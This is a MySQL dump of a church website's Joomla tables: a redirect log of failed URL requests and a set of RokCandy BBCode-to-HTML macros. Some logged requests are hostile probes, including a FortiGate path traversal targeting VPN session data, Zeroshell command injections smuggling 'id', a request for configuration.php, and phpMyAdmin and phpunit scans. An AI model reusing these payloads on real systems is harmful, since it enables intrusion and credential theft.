(11243, 'https://lifeoasisinternationalchurch.org/shop/rss/order/new', NULL, '', '', 4, 0, '2019-08-14 07:25:22', '0000-00-00 00:00:00', 301),
(11244, 'https://lifeoasisinternationalchurch.org/shop/rss/catalog/notifystock', NULL, '', '', 4, 0, '2019-08-14 07:25:24', '0000-00-00 00:00:00', 301),
(11245, 'https://lifeoasisinternationalchurch.org/shop/rss/catalog/review', NULL, '', '', 4, 0, '2019-08-14 07:25:25', '0000-00-00 00:00:00', 301),
(11246, 'https://lifeoasisinternationalchurch.org/demo/rss/order/new', NULL, '', '', 4, 0, '2019-08-14 07:25:26', '0000-00-00 00:00:00', 301),
(11247, 'https://lifeoasisinternationalchurch.org/demo/rss/catalog/notifystock', NULL, '', '', 4, 0, '2019-08-14 07:25:27', '0000-00-00 00:00:00', 301),
(11248, 'https://lifeoasisinternationalchurch.org/demo/rss/catalog/review', NULL, '', '', 4, 0, '2019-08-14 07:25:28', '0000-00-00 00:00:00', 301),
(11249, 'https://lifeoasisinternationalchurch.org/test/rss/order/new', NULL, '', '', 3, 0, '2019-08-14 07:25:34', '0000-00-00 00:00:00', 301),
(11250, 'https://lifeoasisinternationalchurch.org/test/rss/catalog/notifystock', NULL, '', '', 3, 0, '2019-08-14 07:25:35', '0000-00-00 00:00:00', 301),
(11251, 'https://lifeoasisinternationalchurch.org/test/rss/catalog/review', NULL, '', '', 3, 0, '2019-08-14 07:25:36', '0000-00-00 00:00:00', 301),
(11252, 'https://142.4.21.132/nmaplowercheck1565829959', NULL, '', '', 1, 0, '2019-08-15 00:45:58', '0000-00-00 00:00:00', 301),
(11253, 'https://music.lifeoasisinternationalchurch.org/about-us/ordained', NULL, '', '', 8, 0, '2019-08-16 17:04:34', '0000-00-00 00:00:00', 301),
(11254, 'https://www.lifeoasisinternationalchurch.org/plus/mytag_js.php?aid=9527', NULL, '', '', 1, 0, '2019-08-17 16:33:31', '0000-00-00 00:00:00', 301),
(11255, 'https://142.4.21.132/iradio', NULL, 'http://www.bing.com/search?q=amazon', '', 5, 0, '2019-08-18 07:08:38', '0000-00-00 00:00:00', 301),
(11256, 'https://lifeoasisinternationalchurch.org/store/rss/order/new', NULL, '', '', 1, 0, '2019-08-18 09:10:42', '0000-00-00 00:00:00', 301),
(11257, 'https://lifeoasisinternationalchurch.org/store/rss/catalog/notifystock', NULL, '', '', 1, 0, '2019-08-18 09:10:43', '0000-00-00 00:00:00', 301),
(11258, 'https://lifeoasisinternationalchurch.org/store/rss/catalog/review', NULL, '', '', 1, 0, '2019-08-18 09:10:47', '0000-00-00 00:00:00', 301),
(11259, 'https://lifeoasisinternationalchurch.org/staging/rss/order/new', NULL, '', '', 1, 0, '2019-08-18 09:10:59', '0000-00-00 00:00:00', 301),
(11260, 'https://lifeoasisinternationalchurch.org/staging/rss/catalog/notifystock', NULL, '', '', 1, 0, '2019-08-18 09:11:01', '0000-00-00 00:00:00', 301),
(11261, 'https://lifeoasisinternationalchurch.org/staging/rss/catalog/review', NULL, '', '', 1, 0, '2019-08-18 09:11:02', '0000-00-00 00:00:00', 301),
(11262, 'https://lifeoasisinternationalchurch.org/magento/rss/order/new', NULL, '', '', 1, 0, '2019-08-18 09:11:14', '0000-00-00 00:00:00', 301),
(11263, 'https://lifeoasisinternationalchurch.org/magento/rss/catalog/notifystock', NULL, '', '', 1, 0, '2019-08-18 09:11:15', '0000-00-00 00:00:00', 301),
(11264, 'https://lifeoasisinternationalchurch.org/magento/rss/catalog/review', NULL, '', '', 1, 0, '2019-08-18 09:11:16', '0000-00-00 00:00:00', 301),
(11265, 'https://lifeoasisinternationalchurch.org/staging/errors/503.php', NULL, '', '', 1, 0, '2019-08-18 09:14:53', '0000-00-00 00:00:00', 301),
(11266, 'https://lifeoasisinternationalchurch.org/spiritme/index', NULL, '', '', 1, 0, '2019-08-19 10:39:39', '0000-00-00 00:00:00', 301),
(11267, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/index.php?option=com_content&view=article&id=49:mimmp&catid=18:loic&itemid=238', NULL, '', '', 3, 0, '2019-08-20 23:15:10', '0000-00-00 00:00:00', 301),
(11268, 'https://www.lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/7-tutorials', NULL, '', '', 4, 0, '2019-08-20 23:50:56', '0000-00-00 00:00:00', 301),
(11269, 'https://www.lifeoasisinternationalchurch.org/12-sample-content/15-sample-content-4', NULL, '', '', 3, 0, '2019-08-21 06:55:23', '0000-00-00 00:00:00', 301),
(11270, 'https://www.lifeoasisinternationalchurch.org/index.php/mp3-messages/sermon/30-tapping-into-the-anointing-for-increase-3', NULL, '', '', 2, 0, '2019-08-21 17:07:05', '0000-00-00 00:00:00', 301),
(11271, 'https://lifeoasisinternationalchurch.org/destiny', NULL, '', '', 1, 0, '2019-08-23 23:01:36', '0000-00-00 00:00:00', 301),
(11272, 'https://www.lifeoasisinternationalchurch.org/loic/gallery.php', NULL, '', '', 2, 0, '2019-08-24 06:24:04', '0000-00-00 00:00:00', 301),
(11273, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/speaker/2-rev-olusola-ayodele-areogun/series', NULL, '', '', 2, 0, '2019-08-24 10:46:26', '0000-00-00 00:00:00', 301),
(11274, 'https://www.lifeoasisinternationalchurch.org/component/content/article/7-kindom-builder/41-prayer-a-fasting-day-32', NULL, '', '', 1, 0, '2019-08-24 14:12:19', '0000-00-00 00:00:00', 301),
(11275, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=52&itemid=294', NULL, '', '', 5, 0, '2019-08-24 14:31:02', '0000-00-00 00:00:00', 301),
(11276, 'https://www.lifeoasisinternationalchurch.org/2-uncategorised/58-private', NULL, '', '', 1, 0, '2019-08-24 14:31:08', '0000-00-00 00:00:00', 301),
(11277, 'https://lifeoasisinternationalchurch.org/typo3/index.php', NULL, 'https://lifeoasisinternationalchurch.org/typo3/index.php', '', 1, 0, '2019-08-24 17:39:37', '0000-00-00 00:00:00', 301),
(11278, 'https://www.lifeoasisinternationalchurch.org/resources/14-contact-us', NULL, '', '', 1, 0, '2019-08-24 20:34:02', '0000-00-00 00:00:00', 301),
(11279, 'https://www.lifeoasisinternationalchurch.org/update.php', NULL, '', '', 1, 0, '2019-08-25 08:41:19', '0000-00-00 00:00:00', 301),
(11280, 'https://lifeoasisinternationalchurch.org/update.php', NULL, '', '', 1, 0, '2019-08-25 22:50:56', '0000-00-00 00:00:00', 301),
(11281, 'https://lifeoasisinternationalchurch.org/adminpanel/', NULL, 'http://lifeoasisinternationalchurch.org/adminpanel/', '', 1, 0, '2019-08-26 00:39:15', '0000-00-00 00:00:00', 301),
(11282, 'https://lifeoasisinternationalchurch.org/pma1/', NULL, 'http://lifeoasisinternationalchurch.org/pma1/', '', 1, 0, '2019-08-26 08:09:37', '0000-00-00 00:00:00', 301),
(11283, 'https://www.lifeoasisinternationalchurch.org/images/books/breaking', NULL, '', '', 3, 0, '2019-08-26 08:27:30', '0000-00-00 00:00:00', 301),
(11284, 'https://lifeoasisinternationalchurch.org/pma123/', NULL, 'http://lifeoasisinternationalchurch.org/pma123/', '', 1, 0, '2019-08-26 09:01:24', '0000-00-00 00:00:00', 301),
(11285, 'https://www.lifeoasisinternationalchurch.org/template-info/2-uncategorised/47-videos', NULL, '', '', 3, 0, '2019-08-26 21:19:10', '0000-00-00 00:00:00', 301),
(11286, 'https://www.lifeoasisinternationalchurch.org/loic-forum/8-newsflash/6-prophecy', NULL, '', '', 3, 0, '2019-08-27 12:58:03', '0000-00-00 00:00:00', 301),
(11287, 'https://lifeoasisinternationalchurch.org/prvate', NULL, '', '', 1, 0, '2019-08-27 16:11:34', '0000-00-00 00:00:00', 301),
(11288, 'https://lifeoasisinternationalchurch.org/facebooking', NULL, '', '', 1, 0, '2019-08-27 16:17:55', '0000-00-00 00:00:00', 301),
(11289, 'https://www.lifeoasisinternationalchurch.org/index.php?option=com_content&view=article&id=51&itemid=241', NULL, '', '', 3, 0, '2019-08-27 19:38:42', '0000-00-00 00:00:00', 301),
(11290, 'https://www.lifeoasisinternationalchurch.org/about-us/our-service-schedule/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2019-08-27 20:01:39', '0000-00-00 00:00:00', 301),
(11291, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/10-grace-2', NULL, '', '', 3, 0, '2019-08-27 20:03:54', '0000-00-00 00:00:00', 301),
(11292, 'https://www.lifeoasisinternationalchurch.org/7-kindom-builder/41-prayer-a-fasting-day-32', NULL, '', '', 2, 0, '2019-08-27 20:12:33', '0000-00-00 00:00:00', 301),
(11293, 'https://lifeoasisinternationalchurch.org/about-us/ordained/', NULL, '', '', 2, 0, '2019-08-28 01:58:22', '0000-00-00 00:00:00', 301),
(11294, 'https://lifeoasisinternationalchurch.org/livvstreaming', NULL, '', '', 1, 0, '2019-08-28 16:50:27', '0000-00-00 00:00:00', 301),
(11295, 'https://lifeoasisinternationalchurch.org/livv', NULL, '', '', 1, 0, '2019-08-28 16:50:28', '0000-00-00 00:00:00', 301),
(11296, 'https://lifeoasisinternationalchurch.org/livstreaming', NULL, '', '', 1, 0, '2019-08-28 16:50:33', '0000-00-00 00:00:00', 301),
(11297, 'https://lifeoasisinternationalchurch.org/11-demo-articles/5-menu-options', NULL, '', '', 2, 0, '2019-08-29 01:38:09', '0000-00-00 00:00:00', 301),
(11298, 'https://www.lifeoasisinternationalchurch.org/template-info/index.php?option=com_content&view=article&id=52:daddy&catid=18:loic&itemid=294', NULL, '', '', 2, 0, '2019-08-29 03:24:12', '0000-00-00 00:00:00', 301),
(11299, 'https://142.4.21.132/nmaplowercheck1567116563', NULL, '', '', 1, 0, '2019-08-29 22:09:22', '0000-00-00 00:00:00', 301),
(11300, 'https://lifeoasisinternationalchurch.org/private stream', NULL, '', '', 1, 0, '2019-08-30 08:43:15', '0000-00-00 00:00:00', 301),
(11301, 'https://142.4.21.132/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession', NULL, '', '', 2, 0, '2019-08-31 01:01:48', '0000-00-00 00:00:00', 301),
(11302, 'https://www.lifeoasisinternationalchurch.org/index.php/component/content/article/11-demo-articles/20-welcome', NULL, '', '', 2, 0, '2019-08-31 05:34:21', '0000-00-00 00:00:00', 301),
(11303, 'https://www.lifeoasisinternationalchurch.org/resources/baptism/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2019-08-31 07:34:34', '0000-00-00 00:00:00', 301),
(11304, 'https://142.4.21.132/remote/login?lang=en', NULL, '', '', 1, 0, '2019-08-31 23:09:51', '0000-00-00 00:00:00', 301),
(11305, 'https://www.lifeoasisinternationalchurch.org/life', NULL, '', '', 1, 0, '2019-09-01 08:49:17', '0000-00-00 00:00:00', 301),
(11306, 'https://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/10-prayer-a-fasting-day-1', NULL, '', '', 1, 0, '2019-09-01 22:44:45', '0000-00-00 00:00:00', 301),
(11307, 'https://www.lifeoasisinternationalchurch.org/component/content/article/11-demo-articles/53-testing', NULL, '', '', 10, 0, '2019-09-02 02:33:10', '0000-00-00 00:00:00', 301),
(11308, 'https://mail.lifeoasisinternationalchurch.org/about-us/ordained/', NULL, '', '', 2, 0, '2019-09-03 02:41:50', '0000-00-00 00:00:00', 301),
(11309, 'https://lifeoasisinternationalchurch.org/dcradio', NULL, '', '', 1, 0, '2019-09-03 17:30:13', '0000-00-00 00:00:00', 301),
(11310, 'https://www.lifeoasisinternationalchurch.org/7-kindom-builder/33-prayer-a-fasting-day-24', NULL, '', '', 2, 0, '2019-09-04 03:34:08', '0000-00-00 00:00:00', 301),
(11311, 'https://mail.lifeoasisinternationalchurch.org/resources/vod/', NULL, '', '', 1, 0, '2019-09-05 04:02:13', '0000-00-00 00:00:00', 301),
(11312, 'https://lifeoasisinternationalchurch.org/template-info-2/dream-centre-ordained-pastors/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2019-09-05 11:14:05', '0000-00-00 00:00:00', 301),
(11313, 'https://142.4.21.132/remote/login', NULL, '', '', 4, 0, '2019-09-05 15:27:56', '0000-00-00 00:00:00', 301),
(11314, 'https://lifeoasisinternationalchurch.org/component/jcomments/captcha/29072', NULL, '', '', 1, 0, '2019-09-05 17:52:14', '0000-00-00 00:00:00', 301),
(11315, 'https://www.lifeoasisinternationalchurch.org/about-us/ordained/', NULL, '', '', 2, 0, '2019-09-06 01:45:35', '0000-00-00 00:00:00', 301),
(11316, 'https://www.lifeoasisinternationalchurch.org/mp3-messages/sermon/16-entering-into-winning-position-4', NULL, '', '', 1, 0, '2019-09-06 07:14:39', '0000-00-00 00:00:00', 301),
(11317, 'https://lifeoasisinternationalchurch.org/rss/order/new', NULL, '', '', 1, 0, '2019-09-06 21:40:56', '0000-00-00 00:00:00', 301),
(11318, 'https://lifeoasisinternationalchurch.org/rss/catalog/notifystock', NULL, '', '', 1, 0, '2019-09-06 21:40:57', '0000-00-00 00:00:00', 301),
(11319, 'https://lifeoasisinternationalchurch.org/rss/catalog/review', NULL, '', '', 1, 0, '2019-09-06 21:40:58', '0000-00-00 00:00:00', 301),
(11320, 'https://www.lifeoasisinternationalchurch.org/livestraming', NULL, '', '', 1, 0, '2019-09-08 08:15:33', '0000-00-00 00:00:00', 301),
(11321, 'https://lifeoasisinternationalchurch.org//live', NULL, '', '', 1, 0, '2019-09-08 11:49:23', '0000-00-00 00:00:00', 301),
(11322, 'https://lifeoasisinternationalchurch.org//live-', NULL, '', '', 1, 0, '2019-09-08 11:49:26', '0000-00-00 00:00:00', 301),
(11323, 'https://lifeoasisinternationalchurch.org//live-streaming', NULL, '', '', 1, 0, '2019-09-08 11:49:28', '0000-00-00 00:00:00', 301),
(11324, 'https://www.lifeoasisinternationalchurch.org/component/content/category/16-fp-tabs', NULL, '', '', 1, 0, '2019-09-08 22:19:53', '0000-00-00 00:00:00', 301),
(11325, 'https://mobile.12306.cn/otsmobile/app/mgs/mgw.htm?operationtype=com.cars.otsmobile.querylefttickett&requestdata=[{\"train_date\":\"20190914\",\"purpose_codes\":\"00\",\"from_station\":\"shh\",\"to_station\":\"cnw\",\"station_train_code\":\"\",\"start_time_begin\":\"0000\",\"start_time_end\":\"2400\",\"train_headers\":\"qb#\",\"train_flag\":\"\",\"seat_type\":\"\",\"seatback_type\":\"\",\"ticket_num\":\"\",\"dfpstr\":\"hskzebpfboc8ud2uqigmyeirsiy2nhjez2epx5vtejah9avrdqptlcb4geedak_1ck9h7vnhve5gxazxqwm3vsrrnzreqhqimbnyg7xdrkxseeoxy6bvbhrmnu6z66okm6a_zxzufyuplt3ghk8ojboyssibv-ot\",\"basedto\":{\"check_code\":\"8c968f8da9a6fc20f8170b41839e2e91\",\"device_no\":\"xxxwbvkonhmzmeflxzy5iw/9\",\"mobile_no\":\"\",\"os_type\":\"a\",\"time_str\":\"20190909170744\",\"user_name\":\"\",\"version_no\":\"4.2.36\"}}]&ts=1568020064430&sign=', NULL, '', '', 1, 0, '2019-09-09 09:22:13', '0000-00-00 00:00:00', 301),
(11326, 'https://www.lifeoasisinternationalchurch.org/branches/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2019-09-09 15:31:59', '0000-00-00 00:00:00', 301),
(11327, 'https://lifeoasisinternationalchurch.org/privatee', NULL, '', '', 1, 0, '2019-09-10 18:00:19', '0000-00-00 00:00:00', 301),
(11328, 'https://142.4.21.132/_vti_bin/wsts', NULL, '', '', 1, 0, '2019-09-13 00:09:34', '0000-00-00 00:00:00', 301),
(11329, 'https://www.lifeoasisinternationalchurch.org/template-info/media-outreach/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2019-09-13 03:28:37', '0000-00-00 00:00:00', 301),
(11330, 'https://www.lifeoasisinternationalchurch.org//old/', NULL, '', '', 2, 0, '2019-09-13 19:33:14', '0000-00-00 00:00:00', 301),
(11331, 'https://www.lifeoasisinternationalchurch.org//main/', NULL, '', '', 1, 0, '2019-09-13 19:34:13', '0000-00-00 00:00:00', 301),
(11332, 'https://www.lifeoasisinternationalchurch.org//backup/', NULL, '', '', 1, 0, '2019-09-13 19:35:14', '0000-00-00 00:00:00', 301),
(11333, 'https://www.lifeoasisinternationalchurch.org//demo/', NULL, '', '', 1, 0, '2019-09-13 19:35:51', '0000-00-00 00:00:00', 301),
(11334, 'https://www.lifeoasisinternationalchurch.org//temp/', NULL, '', '', 1, 0, '2019-09-13 19:37:23', '0000-00-00 00:00:00', 301),
(11335, 'https://www.lifeoasisinternationalchurch.org//wp1/', NULL, '', '', 1, 0, '2019-09-13 19:38:01', '0000-00-00 00:00:00', 301),
(11336, 'https://www.lifeoasisinternationalchurch.org//v1/', NULL, '', '', 1, 0, '2019-09-13 19:39:18', '0000-00-00 00:00:00', 301),
(11337, 'https://www.lifeoasisinternationalchurch.org//v2/', NULL, '', '', 1, 0, '2019-09-13 19:40:00', '0000-00-00 00:00:00', 301),
(11338, 'https://www.lifeoasisinternationalchurch.org/resources/live-streaming/privat', NULL, '', '', 1, 0, '2019-09-13 23:20:13', '0000-00-00 00:00:00', 301),
(11339, 'https://lifeoasisinternationalchurch.org/dev/', NULL, '', '', 1, 0, '2019-09-14 12:51:54', '0000-00-00 00:00:00', 301),
(11340, 'https://142.4.21.132/nmaplowercheck1568577508', NULL, '', '', 1, 0, '2019-09-15 19:58:31', '0000-00-00 00:00:00', 301),
(11341, 'https://lifeoasisinternationalchurch.org/resources/lprivate', NULL, '', '', 1, 0, '2019-09-17 16:45:39', '0000-00-00 00:00:00', 301),
(11342, 'https://lifeoasisinternationalchurch.org/subscriptions/select-plan', NULL, '', '', 1, 0, '2019-09-18 09:25:38', '0000-00-00 00:00:00', 301),
(11343, 'https://www.lifeoasisinternationalchurch.org/streaming2', NULL, '', '', 1, 0, '2019-09-18 17:21:13', '0000-00-00 00:00:00', 301),
(11344, 'https://lifeoasisinternationalchurch.org/afc2019', NULL, '', '', 1, 0, '2019-09-19 20:17:20', '0000-00-00 00:00:00', 301),
(11345, 'https://www.lifeoasisinternationalchurch.org/login', NULL, '', '', 1, 0, '2019-09-20 19:46:20', '0000-00-00 00:00:00', 301),
(11346, 'https://142.4.21.132/cgi-bin/kerbynet?action=startsessionsubmit&user=\'&id&\'&pw=', NULL, 'https://142.4.21.132:443/cgi-bin/kerbynet?Action=StartSessionSubmit&User=%27%26id%26%27&PW=', '', 1, 0, '2019-09-21 17:10:02', '0000-00-00 00:00:00', 301),
(11347, 'https://142.4.21.132/cgi-bin/kerbynet?action=x509view&section=noauthreq&user=&x509type=\'&id&\'', NULL, 'https://142.4.21.132:443/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%26id%26%27', '', 1, 0, '2019-09-21 17:10:03', '0000-00-00 00:00:00', 301),
(11348, 'https://142.4.21.132/cgi-bin/kerbynet?section=noauthreq&action=x509list&type=\"&id&\"', NULL, 'https://142.4.21.132:443/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=%22%26id%26%22', '', 1, 0, '2019-09-21 17:10:04', '0000-00-00 00:00:00', 301),
(11349, 'https://142.4.21.132/cgi-bin/kerbynet?section=noauthreq&action=x509list&type=*\";id;\"', NULL, 'https://142.4.21.132:443/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;id;%22', '', 1, 0, '2019-09-21 17:10:05', '0000-00-00 00:00:00', 301),
(11350, 'https://142.4.21.132/cgi-bin/kerbynet?stk=insert-stk-token-here&action=render&object=acctentries&filter=&id&', NULL, 'https://142.4.21.132:443/cgi-bin/kerbynet?STk=INSERT-STk-TOKEN-HERE&Action=Render&Object=acctEntries&Filter=%26id%26', '', 1, 0, '2019-09-21 17:10:06', '0000-00-00 00:00:00', 301),
(11351, 'https://142.4.21.132/cgi-bin/kerbynet?stk=insert-stk-token-here&section=router&action=checkipping&ip=&id&', NULL, 'https://142.4.21.132:443/cgi-bin/kerbynet?STk=INSERT-STk-TOKEN-HERE&Section=Router&Action=CheckIPPING&IP=%26id%26', '', 1, 0, '2019-09-21 17:10:07', '0000-00-00 00:00:00', 301),
(11352, 'https://142.4.21.132/cgi-bin/kerbynet?stk=insert-stk-token-here&section=network&action=showinterface&interface=&id&', NULL, 'https://142.4.21.132:443/cgi-bin/kerbynet?STk=INSERT-STk-TOKEN-HERE&Section=Network&Action=ShowInterface&Interface=%26id%26', '', 1, 0, '2019-09-21 17:10:07', '0000-00-00 00:00:00', 301),
(11353, 'https://lifeoasisinternationalchurch.org/download.php?file=configuration.php', NULL, '', '', 1, 0, '2019-09-21 19:05:12', '0000-00-00 00:00:00', 301),
(11354, 'https://www.lifeoasisinternationalchurch.org/resources//index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1', NULL, '', '', 1, 0, '2019-09-22 07:36:15', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(11355, 'https://www.lifeoasisinternationalchurch.org//vendor/phpunit/phpunit/license', NULL, '', '', 1, 0, '2019-09-23 08:16:16', '0000-00-00 00:00:00', 301),
(11356, 'https://www.lifeoasisinternationalchurch.org/api/vendor/phpunit/phpunit/license', NULL, '', '', 1, 0, '2019-09-23 08:16:24', '0000-00-00 00:00:00', 301),
(11357, 'https://www.lifeoasisinternationalchurch.org/laravel/vendor/phpunit/phpunit/license', NULL, '', '', 1, 0, '2019-09-23 08:16:30', '0000-00-00 00:00:00', 301),
(11358, 'https://www.lifeoasisinternationalchurch.org/old/vendor/phpunit/phpunit/license', NULL, '', '', 1, 0, '2019-09-23 08:16:36', '0000-00-00 00:00:00', 301),
(11359, 'https://www.lifeoasisinternationalchurch.org/new/vendor/phpunit/phpunit/license', NULL, '', '', 1, 0, '2019-09-23 08:16:43', '0000-00-00 00:00:00', 301),
(11360, 'https://www.lifeoasisinternationalchurch.org/test/vendor/phpunit/phpunit/license', NULL, '', '', 1, 0, '2019-09-23 08:16:50', '0000-00-00 00:00:00', 301);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_rokcandy`
--

CREATE TABLE `y57u5_rokcandy` (
  `id` int(11) UNSIGNED NOT NULL,
  `catid` int(11) NOT NULL,
  `macro` text NOT NULL,
  `html` text NOT NULL,
  `published` tinyint(1) NOT NULL,
  `checked_out` int(11) NOT NULL,
  `checked_out_time` datetime NOT NULL,
  `ordering` int(11) NOT NULL,
  `params` text NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_rokcandy`
--

INSERT INTO `y57u5_rokcandy` (`id`, `catid`, `macro`, `html`, `published`, `checked_out`, `checked_out_time`, `ordering`, `params`) VALUES
(117, 34, '[code]{text}[/code]', '<code>{text}</code>', 1, 0, '0000-00-00 00:00:00', 1, ''),
(118, 34, '[list bullet-{n}]{list}[/list]', '<ul class=\"style bullet-{n}\">{list}</ul>', 1, 0, '0000-00-00 00:00:00', 7, ''),
(119, 34, '[li]{element}[/li]', '<li>{element}</li>', 1, 0, '0000-00-00 00:00:00', 9, ''),
(120, 34, '[tag url=\"{url}\"]{text}[/tag]', '<a class=\"tag-body\" href=\"{url}\"><span class=\"tag\">{text}</span></a>', 1, 0, '0000-00-00 00:00:00', 10, ''),
(121, 34, '[list special-{n}]{list}[/list]', '<ul class=\"style special-{n}\">{list}</ul>', 1, 0, '0000-00-00 00:00:00', 8, ''),
(122, 34, '[block-number]{number}[/block-number]', '<span class=\"block-number\">{number}</span>', 1, 0, '0000-00-00 00:00:00', 11, ''),
(123, 34, '[event {date}:{month}]{text}[/event]', '<div> <p class=\"event-time\"> {date}:{month}</p>{text}</div>', 1, 0, '0000-00-00 00:00:00', 12, ''),
(124, 34, '[blockquote author=\"{author}\"]{text}[/blockquote]', '<blockquote><p>{text}</p><span class=\"author\">{author}</span></blockquote>', 1, 0, '0000-00-00 00:00:00', 13, ''),
(125, 34, '[box info]{text}[/box]', '<div class=\"uk-alert\">{text}</div>', 1, 0, '0000-00-00 00:00:00', 14, ''),
(126, 34, '[box warning]{text}[/box]', '<div class=\"uk-alert-danger uk-alert\">{text}</div>', 1, 0, '0000-00-00 00:00:00', 15, ''),
(127, 34, '[box hint]{text}[/box]', '<div class=\"uk-alert-warning uk-alert\">{text}</div>', 1, 0, '0000-00-00 00:00:00', 16, ''),
(128, 34, '[box download]{text}[/box]', '<div class=\"uk-alert-success uk-alert\">{text}</div>', 1, 0, '0000-00-00 00:00:00', 17, ''),
(129, 34, '[h1 dotted]{text}[/h1]', '<h1 class=\"dotted\">{text}</h1>', 1, 0, '0000-00-00 00:00:00', 1, ''),
(130, 34, '[h2 dotted]{text}[/h2]', '<h2 class=\"dotted\">{text}</h2>', 1, 0, '0000-00-00 00:00:00', 2, ''),
(131, 34, '[h3 dotted]{text}[/h3]', '<h3 class=\"dotted\">{text}</h3>', 1, 0, '0000-00-00 00:00:00', 3, ''),
(132, 34, '[h4 dotted] {text} [/h4]', '<h4 class=\"dotted\">{text}</h4>', 1, 0, '0000-00-00 00:00:00', 4, ''),
(133, 34, '[h5 dotted] {text} [/h5]', '<h5 class=\"dotted\">{text}</h5>', 1, 0, '0000-00-00 00:00:00', 5, ''),
(134, 34, '[h6 dotted] {text} [/h6]', '<h6 class=\"dotted\">{text}</h6>', 1, 0, '0000-00-00 00:00:00', 6, ''),
(135, 34, '[del]{text}[/del]', '<del>{text}</del>', 1, 0, '0000-00-00 00:00:00', 2, ''),
(136, 34, '[ins]{text}[/ins]', '<ins>{text}</ins>', 1, 0, '0000-00-00 00:00:00', 3, ''),
(137, 34, '[dfn title=\"{definition}\"]{text}[/dfn]', '<dfn title=\"{definition}\">{text}</dfn>', 1, 0, '0000-00-00 00:00:00', 4, ''),
(138, 34, '[abbr title=\"{definition}\"]{text}[/abbr]', '<abbr title=\"{definition}\">{text}</abbr>', 1, 0, '0000-00-00 00:00:00', 5, ''),
(139, 34, '[mark]{text}[/mark]', '<mark>{text}</mark>', 1, 0, '0000-00-00 00:00:00', 6, ''),
(140, 34, '[box content]{text}[/box]', '<div class=\"uk-alert\">{text}</div>', 1, 0, '0000-00-00 00:00:00', 18, ''),
(141, 34, '[box note]{text}[/box]', '<div class=\"uk-alert\">{text}</div>', 1, 0, '0000-00-00 00:00:00', 19, ''),
(142, 34, '[button href=\"{url}\"]{text}[/button]', '<a href=\"{url}\" class=\"button\">{text}</a>', 1, 0, '0000-00-00 00:00:00', 20, ''),
(143, 34, '[button color href=\"{url}\"]{text}[/button]', '<a href=\"{url}\" class=\"button-color\">{text}</a>', 1, 0, '0000-00-00 00:00:00', 21, ''),
(144, 34, '[clearfix]', '<p class=\"clearfix\"></p>', 1, 0, '0000-00-00 00:00:00', 22, ''),
(145, 34, '[toggle state=\"{state}\" title=\"{title}\"]{text}[/toggle]', '<ul class=\"showhide\"><li class=\"uk-toggle-{state}\"><i class=\"toggle-button\"></i><h4>{title}</h4><div>{text}</div></li></ul>', 1, 0, '0000-00-00 00:00:00', 23, ''),
(146, 34, '[show-title]{text}[/show-title]', '<div class=\"show-title\">{text}</div>', 1, 0, '0000-00-00 00:00:00', 24, ''),
(147, 34, '[img hidden url=\"{url}\" title=\"{title}\"][/img]', '<img class=\"header-img hidden-img\" src =\"{url}\" alt=\"title\"/>', 1, 0, '0000-00-00 00:00:00', 25, ''),
(148, 34, '[show-text]{text}[/show-text]', '<div class=\"show-text\">{text}</div>', 1, 0, '0000-00-00 00:00:00', 26, ''),
(149, 34, '[dropcap]{text}[/dropcap]', '<p class=\"dropcap\">{text}</p>', 1, 0, '0000-00-00 00:00:00', 27, ''),
(150, 34, '[column one-half]{content}[/column]', '<div class=\"uk-width-medium-1-2\">{content}</div>', 1, 0, '0000-00-00 00:00:00', 29, ''),
(151, 34, '[row]{columns}[/row]', '<div class=\"uk-grid\">{columns}</div>', 1, 0, '0000-00-00 00:00:00', 28, ''),
(152, 34, '[column one-third]{content}[/column]', '<div class=\"uk-width-medium-1-3\">{content}</div>', 1, 0, '0000-00-00 00:00:00', 30, ''),
(153, 34, '[column one-fourth]{content}[/column]', '<div class=\"uk-width-1-2 uk-width-medium-1-4\">{content}</div>\r\n', 1, 0, '0000-00-00 00:00:00', 31, ''),
(154, 34, '[column one-fifth]{content}[/column]', '<div class=\"uk-width-medium-1-5\">{content}</div>', 1, 0, '0000-00-00 00:00:00', 32, ''),
(155, 34, '[column one-sixth]{content}[/column]', '<div class=\"uk-width-medium-1-6\">{content}</div>', 1, 0, '0000-00-00 00:00:00', 33, ''),
(156, 34, '[column two-thirds]{content}[/column]', '<div class=\"uk-width-medium-2-3\">{content}</div>', 1, 0, '0000-00-00 00:00:00', 34, ''),
(157, 34, '[column two-fourths]{content}[/column]', '<div class=\"uk-width-medium-2-4\">{content}</div>', 1, 0, '0000-00-00 00:00:00', 35, ''),
(158, 34, '[column three-fourths]{content}[/column]', '<div class=\"uk-width-medium-3-4\">{content}</div>', 1, 0, '0000-00-00 00:00:00', 36, ''),
(159, 34, '[testimonial author=\"{author}\" title=\"{title}\"]{text}[/testimonial]', '<blockquote><p class=\"icon\">{text}</p><span class=\"author\">{author}</span><br><span class=\"jobtitle\">{title}</span></blockquote>', 1, 0, '0000-00-00 00:00:00', 37, ''),
(160, 34, '[faq state=\"{state}\" question=\"{question}\"]{answer}[/faq]', '<ul class=\"showhide\"><li class=\"uk-toggle-{state}\"><i class=\"toggle-button\"></i><h4>{question}</h4><div>{answer}</div></li></ul>', 1, 0, '0000-00-00 00:00:00', 38, ''),
(162, 34, '[column twelve]{content}[/column]', '<div class=\"uk-width-1-1\">{content}</div>', 1, 0, '0000-00-00 00:00:00', 29, ''),
